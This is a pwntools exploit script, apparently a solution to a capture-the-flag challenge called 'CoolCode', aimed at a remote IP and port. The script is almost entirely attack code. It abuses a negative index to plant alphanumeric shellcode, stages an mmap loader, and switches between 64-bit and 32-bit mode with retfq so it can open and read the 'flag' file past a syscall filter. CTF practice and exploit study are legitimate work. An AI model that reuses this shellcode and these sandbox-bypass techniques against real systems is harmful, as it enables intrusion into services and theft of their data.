```
from pwn import *
context.log_level = "debug"
context.arch = 'amd64'
elf = ELF("demo")
local = 0
if local:
p = process("./CoolCode")
else:
p = remote("39.107.119.192", 9999)

def db():
gdb.attach(p, 'b delete')

def choose(num):
p.sendlineafter("Your choice :", str(num))

def add(idx, mes):
choose(1)
p.sendlineafter("Index: ", str(idx))
p.sendafter("messages: ", mes)

def show(idx):
choose(2)
p.sendlineafter("Index: ", str(idx))

def delete(idx):
choose(3)
p.sendlineafter("Index: ", str(idx))

chunk_list = 0x602140

add(-37, "SX"+"RXWZ"+"4S0BD"+"SX4045"+"0BC"+"48420BB"+"XXX" +"UX")
#db()
'''
push rsp
pop rdx
xor esi, DWORD PTR [edx]
push rdx
pop rax
xor edi, DWORD PTR [eax]
push rbx
pop rax
xor al,0x5A
push rax
pop rdx
push rbp
pop rax
push rsi
'''
add(0, "TZ"+"32"+"RX"+"38"+"SX"+"4Z"+"PZ"+"UX")
add(1, "RZ"*7+"VVWX")#----
#db()
delete(0)
shellcode_mmap = '''
/*mmap(0x40000000,0x100,7,34,0,0)*/
push 0x40000000 /*set rdi*/
pop rdi
push 0x100 /*set rsi*/
pop rsi
push 7 /*set rdx*/
pop rdx
push 0x22 /*set rcx*/
pop r10
push 0 /*set r8*/
pop r8
push 0 /*set r9*/
pop r9
push 0x9
pop rax
syscall/*syscall*/
push rdi
pop rsi
push 0
pop rax
push 0x100
pop rdx
push 0
pop rdi
syscall
push rsi
ret
'''

p.sendline(asm(shellcode_mmap))
payload = '''
push 0x23
push 0x4000000b
pop rax
push rax
retfq
'''
open_shellcode = '''
mov esp, 0x40000100
xor ecx,ecx
xor edx,edx
mov eax,0x5
push 0x67616c66
mov ebx,esp
int 0x80
mov ecx,eax
'''
ret_64 = '''
push 0x33
push 0x40000030
retfq
nop
nop
nop
nop
nop
nop
'''
read_shellcode = '''
push 0x3;
pop rdi;
push 0x0;
pop rax;
push 0x40000200
pop rsi;
push 0x100;
pop rdx;
syscall;
'''

write_shellcode = '''
push 0x1
pop rdi
push 0x1
pop rax
syscall
'''
#db()
raw_input("write flag")
p.sendline(asm(payload)+asm(open_shellcode)+asm(ret_64)+asm(read_shellcode)+asm(write_shellcode))

p.interactive()

```